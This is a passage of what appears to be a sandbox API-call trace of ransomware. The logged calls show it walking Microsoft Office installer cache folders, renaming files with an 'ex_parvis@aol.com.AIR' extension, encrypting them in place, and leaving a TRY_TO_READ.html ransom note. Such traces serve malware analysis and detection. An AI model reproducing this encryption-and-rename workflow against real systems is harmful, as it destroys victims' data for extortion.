users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0131.653] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x474 [0131.654] GetProcessHeap () returned 0x2e0000 [0131.654] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0131.654] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2503680) returned 1 [0131.654] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x263400 [0131.654] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0131.654] GetProcessHeap () returned 0x2e0000 [0131.654] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0131.654] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0131.654] WriteFile (in: hFile=0x474, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0131.656] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0131.656] WriteFile (in: hFile=0x474, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0131.656] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x263400) returned 0x30d0020 [0131.656] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x263400) returned 0x3340020 [0131.657] SetFilePointer (in: hFile=0x474, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.657] ReadFile (in: hFile=0x474, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x263400, lpOverlapped=0x0) returned 1 [0131.784] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35de98 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.785] GetLastError () returned 0x0 [0131.785] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.785] GetLastError () returned 0x0 [0131.785] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.785] GetLastError () returned 0x0 [0131.785] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.785] GetLastError () returned 0x0 [0131.785] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc47e320, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x97f3f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PubLR.cab", cAlternateFileName="")) returned 1 [0131.785] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.785] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.786] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.786] GetLastError () returned 0x0 [0131.786] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0131.786] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.786] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.786] GetLastError () returned 0x0 [0131.786] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971aaa50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0131.786] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0131.786] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0131.786] GetLastError () returned 0x0 [0131.786] FindNextFileW (in: hFindFile=0x35de98, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971aaa50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971aaa50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971aaa50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x319c88 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0131.786] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0131.786] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0131.786] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0131.786] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0131.787] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0131.787] GetProcessHeap () returned 0x2e0000 [0131.787] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x385368 [0131.787] lstrcpyW (in: lpString1=0x385368, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" [0131.787] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0131.787] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0131.790] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.790] GetProcessHeap () returned 0x2e0000 [0131.790] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0131.790] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1608) returned 1 [0131.790] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x648 [0131.790] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0131.790] GetProcessHeap () returned 0x2e0000 [0131.790] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0131.790] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0131.790] WriteFile (in: hFile=0x264, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0131.792] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0131.792] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0131.792] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x648) returned 0x385368 [0131.792] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x648) returned 0x3859b8 [0131.792] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.792] ReadFile (in: hFile=0x264, lpBuffer=0x385368, nNumberOfBytesToRead=0x648, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385368*, lpNumberOfBytesRead=0x2acf9c8*=0x648, lpOverlapped=0x0) returned 1 [0131.792] SetFilePointer (in: hFile=0x264, lDistanceToMove=-1608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.792] WriteFile (in: hFile=0x264, lpBuffer=0x3859b8*, nNumberOfBytesToWrite=0x648, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3859b8*, lpNumberOfBytesWritten=0x2acf9c8*=0x648, lpOverlapped=0x0) returned 1 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3859b8 | out: hHeap=0x2e0000) returned 1 [0131.793] CloseHandle (hObject=0x264) returned 1 [0131.793] GetProcessHeap () returned 0x2e0000 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0131.793] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x312a78 | out: hHeap=0x2e0000) returned 1 [0131.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x312a78 [0131.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0131.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0131.794] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0131.794] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0131.794] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", dwFileAttributes=0x80) returned 1 [0131.794] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 73 [0131.794] GetProcessHeap () returned 0x2e0000 [0131.794] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x319c88 [0131.794] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" [0131.794] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0131.794] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0131.797] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.797] GetProcessHeap () returned 0x2e0000 [0131.797] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0131.797] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9958388) returned 1 [0131.797] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x97f3f4 [0131.797] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0131.797] GetProcessHeap () returned 0x2e0000 [0131.797] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0131.797] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0131.797] WriteFile (in: hFile=0x264, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0131.800] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0131.800] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0131.800] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x97f3f4) returned 0x30d0020 [0131.801] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x97f3f4) returned 0x3a50020 [0131.801] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.801] ReadFile (in: hFile=0x264, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x97f3f4, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x97f3f4, lpOverlapped=0x0) returned 1 [0132.301] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0132.301] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0132.301] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", dwFileAttributes=0x80) returned 1 [0132.301] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 80 [0132.301] GetProcessHeap () returned 0x2e0000 [0132.301] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x319c88 [0132.302] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0132.302] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0132.302] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0132.305] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0132.305] GetProcessHeap () returned 0x2e0000 [0132.305] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0132.305] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1450) returned 1 [0132.305] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x5aa [0132.305] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 